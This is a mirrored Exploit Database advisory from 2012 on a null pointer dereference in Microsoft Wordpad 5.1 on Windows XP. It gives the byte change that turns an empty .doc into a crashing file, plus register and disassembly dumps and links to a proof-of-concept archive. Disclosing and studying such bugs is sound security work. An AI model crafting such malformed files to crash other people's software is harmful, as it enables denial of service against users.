Microsoft Wordpad 5.1 – ‘.doc’ Null Pointer Dereference

• Exploit Database
• 11 阅读

• 作者： condis
  日期： 2012-05-30
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/18952/

• Microsoft Wordpad 5.1 (.doc) Null Pointer Dereference Vulnerability
  Found by condis
  
  Tested on Windows XP SP 3 Proffesional PL
  MS Wordpad 5.1 (Compilation 2600.xpsp.080413-2111 SP 3)
  
  This isn't bug from CWE 2009-0259
  
  $ Binnary diff of template file (proper empty doc document) and malformed file 
  (showing just the offset that differs):
  
  0000 1200: 00 00 00 00 00 00 00 0000 00 00 00 00 00 00 00 -- template file
  0000 1200: 00 00 00 00 00 00 63 6F6E 64 00 00 00 00 00 00 -- proof of concept
  
  Actually it doesn't matters (almost) what 4 bytes we will put there untill they != 0x00. 
  
  Access violation when reading [00000004]
  
  $ Registers:
  
  eax = 020ebb72 ebx = 00000000 ecx = 020ebb7c edx = 00090608 
  esi = 00000000 edi = 01bc04a8 eip = 01b9dbbb esp = 0177f5c8 
  ebp = 0177f5cc 
  
  $ Function dump :
  
  01b9dbb4 55pushebp
  01b9dbb5 8becmov ebp,esp
  01b9dbb7 56pushesi
  01b9dbb8 8b7508mov esi,dword ptr [ebp+8]
  01b9dbbb 807e0400cmp byte ptr [esi+4],0 ds:0023:00000004=?? ; ---- crash
  01b9dbbf 751bjne mswrd8+0x1dbdc (01b9dbdc)
  01b9dbc1 8b06mov eax,dword ptr [esi]
  01b9dbc3 57pushedi
  01b9dbc4 8b78fcmov edi,dword ptr [eax-4]
  01b9dbc7 57pushedi
  01b9dbc8 ff156010b801calldword ptr [mswrd8+0x1060 (01b81060)]
  01b9dbce 57pushedi
  01b9dbcf ff157410b801calldword ptr [mswrd8+0x1074 (01b81074)]
  01b9dbd5 56pushesi
  01b9dbd6 e87bfdffffcallmswrd8+0x1d956 (01b9d956)
  01b9dbdb 5fpop edi
  01b9dbdc 5epop esi
  01b9dbdd 5dpop ebp
  
  $ 'O, hai' goes to Echo, Varseand, cxecurity and madcow ;3
  
  $ Below You should see link to attachement with PoC:
  
  http://cond.psychodela.pl/d/ms-wordpad-nullptr.rar
  https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/18952.rar